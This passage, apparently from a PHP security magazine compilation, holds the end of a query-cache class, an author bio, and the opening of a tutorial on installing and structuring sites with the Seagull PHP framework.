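        $this->ttl = $ttlSeconds;
    }

    /** @param callable $runQuery receives the SQL string and returns the result rows */
    public function fetch(string $sql, callable $runQuery, ?int $now = null): array
    {
        $now = $now ?? time();
        $key = md5($sql);
        // Cache hit: an entry exists and has not expired yet.
        if (isset($this->entries[$key]) && $this->entries[$key]['expires'] > $now) {
            return $this->entries[$key]['rows'];
        }
        // Empty, expired, or invalidated: run the query and store the result.
        $rows = $runQuery($sql);
        $this->entries[$key] = ['rows' => $rows, 'expires' => $now + $this->ttl];
        return $rows;
    }

    // Call after an UPDATE or INSERT so stale results are never served.
    public function invalidate(): void
    {
        $this->entries = [];
    }
}
```

Clearing the whole cache on every write is the bluntest possible policy; it keeps the sketch short, at the cost of throwing away results for tables the write never touched.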

ILIA ALSHANETSKY is the principal of Advanced Internet Designs Inc., which specializes in security auditing, performance analysis and application development. He is the author of FUDforum (http://fudforum.org), a highly popular, Open Source bulletin board, focused on providing the maximum functionality at the highest levels of security and performance. Ilia is a core PHP Developer, an active member of PHP’s QA team, and was the Release Master for the PHP 4.3.x series. He has authored and co-authored a number of extensions, most notably SHMOP, PDO, SQLite and GD, and is responsible for a large number of bug fixes and performance tweaks in the language. A prolific lecturer and writer, Ilia can be found speaking at international conferences. He is frequently published in print and online magazines on a variety of PHP topics, and is also the author of an upcoming book on PHP security. Ilia can be reached at ilia@ilia.ws.


FLOCKING TO SEAGULL

This article teaches developers to create sites quickly by concentrating on application-specific code and letting the Seagull PHP framework handle the rest.

A web framework is a necessity when developing a serious website. Programmers should not recreate basic web elements when great tools to help them get the job done already exist. One of these tools, Ruby on Rails, garnered much attention when it was released in July 2004. It simplified Ruby development, separated data from display, and made web development fun.

Various PHP frameworks exist, including a Rails clone called Cake (http://www.cakephp.org), which is still early in development. This article will concentrate on another framework, one called Seagull (http://seagull.phpkitchen.com). It’s fast, secure, has very clean code and doesn’t look half bad, either.

Seagull is a BSD-licensed, object-oriented application built on solid, heavily-tested tools, and uses more than a few PEAR libraries for many of its tasks. It is very easy to install, using the PEAR installer, and offers a web-based installation procedure. It uses good coding practices such as design patterns, database abstraction and separation of content and presentation.

LINKS:

http://seagull.phpkitchen.com
http://seagull.phpkitchen.com/apidocs/
http://pear.php.net/package/HTML_Template_Flexy

Seagull frees developers from repetitive programming tasks and lets them concentrate on application-specific code. It is completely modular, so new features can easily be added to the system. The developer community also pays considerable attention to maintaining a cleanly structured codebase, observing security guidelines and respecting web standards like XHTML and CSS.

Although it has a very low release number, this framework offers much functionality, like user and permission management, and some ready-to-use modules like Publisher (a lightweight CMS), a contact-us module, a guestbook module, a module for setting up a list of FAQs (Frequently Asked Questions) and even a shopping cart. It also has a front controller that lets you easily create search engine friendly URLs like http://www.example.com/index.php/contactus/action/list/.
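To give a feel for how a front controller can turn such a URL into a request, here is a hypothetical parser. It is not Seagull's actual implementation: it simply assumes that the first path segment after index.php names the module and that the remaining segments are key/value pairs.

```php
<?php
// Hypothetical parser; Seagull's own front controller may differ in its details.
function parse_sef_url(string $url, string $script = 'index.php'): array
{
    $path = (string) parse_url($url, PHP_URL_PATH);
    $pos  = strpos($path, '/' . $script);
    if ($pos === false) {
        throw new InvalidArgumentException("URL does not pass through $script");
    }

    // Everything after the script name carries the request information.
    $rest     = substr($path, $pos + strlen('/' . $script));
    $segments = array_values(array_filter(explode('/', $rest), 'strlen'));

    $module = array_shift($segments); // null when no module is given
    $params = [];
    for ($i = 0; $i + 1 < count($segments); $i += 2) {
        $params[$segments[$i]] = $segments[$i + 1];
    }
    return ['module' => $module, 'params' => $params];
}

print_r(parse_sef_url('http://www.example.com/index.php/contactus/action/list/'));
```

Under these assumptions the example URL resolves to the contactus module with a single parameter, action set to list.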

The project was started in 2001 by Demian Turner, who wanted to create a simple and stable framework, using innovative design patterns for his project. Since October 2003, the project has been hosted on SourceForge (http://www.sourceforge.net/projects/seagull/).

You may be wondering where Seagull got its name: Demian Turner was on a ferry surrounded by some seagulls. As the birds were coasting along with the boat, they twisted their necks to get a better view of the passengers. He found this really interactive (for the birds) and he thought the main focus of a framework should be interactivity. That’s why it’s called Seagull.

If you’ve never used a web framework, you may wonder if the advantages of such a system outweigh the cost of learning how to use it. You may think that since creating sites from scratch has worked, you should continue doing things that way. All we ask is that you follow this tutorial to create a simple site with Seagull. If you find it doesn’t save you time, don’t use it. If you wonder how you ever lived without it, great! If you have used a web framework before, the following tutorial will introduce you to Seagull and give you a handle on its various idiosyncrasies.

This tutorial will walk you through the steps of creating a medium sized application with Seagull. We will need to install the framework, create a few users, manage permissions, use various modules (like the CMS module for sharing articles) and, last but not least, modify the look and feel so it fits with your corporate identity. Additionally, we will create a new module called “wish list,” in which users will be able to sign up and add/edit/delete items from their wish lists, which will be publicly viewable. This is a simple application, but one practical enough to give you all the tools necessary to create your own site. Let’s get started!

Model-View-Controller

Seagull uses the Model View Controller pattern. For an introduction to the MVC pattern, see the May 2003 issue of php|architect (https://www.phparch.com/issue.php?mid=9).

Figure 1 shows how MVC is implemented in Seagull.


FIGURE 1

System Architecture

The framework consists of:

• base framework: The framework itself is made up of a set of base classes, organized according to the MVC design pattern, that take care of permissions, authentication, sessions, input/output and database abstraction.

• modules: Each generalized area of functionality comes in the form of a module that is associated with manager classes, blocks, or items. You may find your business requirements already implemented in one of these pre-made modules.

• libraries: Most task-specific functionality comes from libraries, which are quite often from PEAR (http://pear.php.net). These libraries can be independently updated when upgrades/improvements are available.

• entities/entity managers: Each object in the application such as Member, Group, Property, Document, Article, etc. is represented by an entity. You can quickly prototype entities using the tools Seagull provides to create skeleton classes.

Directory Structure

Before starting to use Seagull, let’s have a look at the directories it contains. You can see the complete structure in Figure 2.

In detail:

• Root directory: init.php and constants.php

• etc/: basic configuration files, SQL files, etc.

• lib/: libraries (Seagull, PEAR and other) and data files like arrays for country names or languages in lib/data/

• modules/: each module has its own subdirectory

• var/: for all temporary data like compiled templates, DB_DataObject entities, log files and sessions. This directory must be writeable by the webserver.

• www/: application webroot which contains the front controller script, themes and Javascript. Only this directory should be viewable to the web; otherwise, make sure to protect the others with .htaccess files.

Basic Classes

Basic tasks like connecting to a database, sending emails or formatting output are done using the Seagull Base Classes, contained in /lib/SGL/. These classes provide Seagull with its basic functionality and do not need to be completely understood before using Seagull. We advise you to become familiar with these classes when you get the chance, however, as it will give you a greater understanding of the framework itself. For a deeper look at these classes, please visit the API documentation at the project homepage.
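The requirement that var/ be writeable by the webserver lends itself to a quick pre-flight check. The sketch below is not part of Seagull; unwritable_dirs() is an invented helper, and the installation path is an assumption to adjust for your own setup.

```php
<?php
// Hypothetical pre-flight check: report directories that are missing or not writable.
function unwritable_dirs(string $root, array $dirs): array
{
    $problems = [];
    foreach ($dirs as $dir) {
        $path = rtrim($root, '/') . '/' . $dir;
        if (!is_dir($path) || !is_writable($path)) {
            $problems[] = $path;
        }
    }
    return $problems;
}

// Assumed installation path; run this as the same user the webserver runs as.
foreach (unwritable_dirs('/path/to/seagull', ['var']) as $path) {
    echo "Not writable: $path\n";
}
```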

Templates and Themes

Seagull uses templates and themes for separating data from layout. By default, the PEAR package HTML_Template_Flexy is used. Flexy compiles all HTML templates into PHP scripts that are never edited by the developer. You also won’t need to worry that template files are being parsed every time a request is made.

By using templates, you can split the jobs for programming and designing to different people. This way, a designer will never have access to the program logic and will be unable to ruin your carefully crafted code.

A theme, in turn, is a collection of directories placed in www/themes/. Each subdirectory contains the HTML templates for the module it represents.

FIGURE 2

FIGURE 3

Installation

Installing Seagull is very easy. All you need is a webserver (like Apache or IIS), PHP (version 4.1 or newer; PHP 5 works, too), and a database (e.g., MySQL, PostgreSQL, Oracle) before you can begin.

First, download the most recent version of Seagull from the project homepage, and unpack it into your webroot directory.

Alternatively, you can use the PEAR package manager. This method is the easiest and fastest way to get Seagull up and running, but there are a few requirements:

• You must be running a recent version of PHP (4.3.4+) with the base PEAR packages installed.

• You must set the pear data_dir to your webroot, or point it to anywhere on your filesystem and subsequently create a virtual host to expose the www directory. This is done with the -d data_dir=/path/to/data/dir switch. To view your current settings, use pear config-show.

• Your preferred package state must be set to alpha. The current state of the Seagull project is stable, but there is a dependency on the Validate library, which has been alpha for ages now.

So, to install Seagull using the PEAR installer, type the following on the command line (on one line):

pear -d data_dir=/path/to/web/root \
  -d preferred_state=alpha install \
  --onlyreqdeps \
  http://kent.dl.sourceforge.net/sourceforge/seagull/seagull-0.4.5.tgz

Once you have performed the installation with the PEAR package manager, don’t forget to revert your PEAR configuration settings to their original state.

Now, let’s continue the installation process.

Title	Focus on Security
Authors	Ilia Alshanetsky, Ben Ramsey, William Zeller, Werner M. Krauss, Chris Shiflett, Rubén Martínez Ávila, Peter MacIntyre, Marco Tabini
School	Nexcess.net
Major	Computer Science / Web Security
Type	Document
City	Ann Arbor

Format
Pages	60
File size	4.01 MB